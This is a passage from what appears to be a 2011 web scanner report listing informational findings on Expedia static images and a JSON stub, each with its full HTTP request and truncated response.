Date: Mon, 03 Oct 2011 00:10:55 GMT
Connection: close

{ url: 'http://www.tripadvisor.com/HotelLander' }

29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"883-1317085625464"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 883
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR... ...S.....P.......sRGB.........PLTE.....i.......2X.5].....f..9.....1.-O.....m.7J.........F...3Y.......5\.......0T..P.4Z.4\.7O.......7N.8R.....Q..3..9..=..Y...........b.4[....8O....8
...[SNIP]...

29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"4221-1317085625006"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 4221
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR.............7.c2....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...

29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"6824-1317085613547"
Last-Modified: Tue, 27 Sep 2011 01:06:53 GMT
Content-Length: 6824
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

.PNG
.
...IHDR...i..........pi.....sRGB.........bKGD.............    pHYs.................tIME..... 0.......(IDATx..]k..Wu.zfvg.Z...^..^.e..%tG.%9.....G..    ........q...!...
.r......"......d.p$.b.....,y%
...[SNIP]...

29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/progressAnim.gif

Request

GET /static/fusion/v2.3/images/progressAnim.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; JSESSION=965e7753-b813-4f22-a4ce-feaa1b098dbb; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1651-1317085619476"
Last-Modified: Tue, 27 Sep 2011 01:06:59 GMT
Content-Length: 1651
Date: Mon, 03 Oct 2011 00:09:40 GMT
Connection: close

GIF89aS..................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...

29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/eta/commonIcons.gif

Request

GET /static/default/default/eta/commonIcons.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2287-1317080315836"
Last-Modified: Mon, 26 Sep 2011 23:38:35 GMT
Content-Length: 2287
Date: Mon, 03 Oct 2011 01:02:56 GMT
Connection: keep-alive

GIF89a..X..U.....f.3f.I...........Ky....P}.................)..........o\Vg......r....O8......Hu............................D+...t...j.Z..l....6[..:k.T}.x........t....6.V@...............i~...........
...[SNIP]...

29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/bpg/BPG_logo_US.gif

Request

GET /static/default/default/images/bpg/BPG_logo_US.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"993-1317085618048"
Last-Modified: Tue, 27 Sep 2011 01:06:58 GMT
Content-Length: 993
Date: Mon, 03 Oct 2011 01:02:55 GMT
Connection: keep-alive

GIF89ad.......Oq.Cg......[u.j.....=\{......y........j....................Lh.....6]...........................!.......,....d..........u5..Xl.Nf|U]..m.    E......    l    IN.0..... 0M....pp.,    B.".dc..%.S[..W@.V
...[SNIP]...

29.31. https://www.expedia.com/static/default/default/images/creditcard.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/creditcard.gif

Request

GET /static/default/default/images/creditcard.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2695-1317085580923"
Last-Modified: Tue, 27 Sep 2011 01:06:20 GMT
Content-Length: 2695
Date: Mon, 03 Oct 2011 01:02:51 GMT
Connection: keep-alive

GIF89aZ.9....Tegq........fyz.......vx..0...Mbd........(....Or..............F...V.l..CBXZ.EN.......x........WY^rs.~-...{..I^`zOU......m}.......:BVjl......kZ_......XuH..............nemc}...+6....V...Q
...[SNIP]...

29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/popup_bottom_notch.gif

Request

GET /static/default/default/images/popup_bottom_notch.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"131-1317080309140"
Last-Modified: Mon, 26 Sep 2011 23:38:29 GMT
Content-Length: 131
Date: Mon, 03 Oct 2011 01:02:55 GMT
Connection: keep-alive

GIF89a........33.3f.ff...............!.......,..........H(1....9A.......euY..D:)...pX........|.'.o.(M.B...LR....T3..H"...]..-x.N..;

29.33. https://www.expedia.com/static/default/default/images/progressbar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/images/progressbar.gif

Request

GET /static/default/default/images/progressbar.gif HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1053-1317085585102"
Last-Modified: Tue, 27 Sep 2011 01:06:25 GMT
Content-Length: 1053
Date: Mon, 03 Oct 2011 01:02:51 GMT
Connection: keep-alive

GIF89a@............4Mjbt................w..................6X...........................................................................................................................................
...[SNIP]...

29.34. https://www.expedia.com/static/default/default/stubs/adserver.json

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/default/default/stubs/adserver.json

Request

GET /static/default/default/stubs/adserver.json HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"51-1317085587388"
Last-Modified: Tue, 27 Sep 2011 01:06:27 GMT
Content-Length: 51
Date: Mon, 03 Oct 2011 01:08:47 GMT
Connection: keep-alive

{ url: 'http://www.tripadvisor.com/HotelLander' }

29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"883-1317080325986"
Last-Modified: Mon, 26 Sep 2011 23:38:45 GMT
Content-Length: 883
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

.PNG
.
...IHDR... ...S.....P.......sRGB.........PLTE.....i.......2X.5].....f..9.....1.-O.....m.7J.........F...3Y.......5\.......0T..P.4Z.4\.7O.......7N.8R.....Q..3..9..=..Y...........b.4[....8O....8
...[SNIP]...

29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBGtransparent.png

Request

GET /static/fusion/v2.3/images/buttonBGtransparent.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
